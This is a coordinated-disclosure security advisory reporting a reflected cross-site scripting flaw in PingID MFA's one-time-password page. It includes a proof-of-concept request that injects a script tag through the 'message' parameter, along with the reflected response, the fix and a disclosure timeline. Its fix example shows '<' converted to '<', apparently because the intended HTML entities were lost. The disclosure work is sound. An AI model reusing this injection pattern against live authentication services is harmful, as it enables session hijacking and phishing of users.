#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:        High
# Effect:     Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:      18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticate with a
second factor. You can configure your policies based upon the following:
    Group - Require MFA for members of a specific group.
    Application - Require MFA for specific applications.
    Geofence - Require MFA if the user is outside a pre-set geofence.
    Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.
    Network IP - Require MFA if the device isn't in a specific IP range.
PingID MFA delivers the granular security that your policies require with the ease
of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's authentication
process, which allows an attacker to manipulate the resulting website. This allows,
for instance, attacking the user's browser or redirecting the user to a phishing website.


Technical Description
---------------------
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the user's browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=123456&message=<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313

<!DOCTYPE html>
<html>
<head>
    [CUT]
</head>
<body>
[CUT]
    <div class="admin-message"><script>alert(0)</script></div>
[CUT]
</body>
</html>


Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be fixed by
properly encoding all output, which is posted back to the user.
For instance, using HTML encoding, to convert < to < and > to >.


Timeline:
---------
2017-05-16:     Coordinated public disclosure date
2017-05-03:     Release of fixed version/patch
2017-04-20:     Initial vendor response
2017-04-19:     Initial vendor notification
2017-04-13:     Discovery by Stephan Sekula


References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html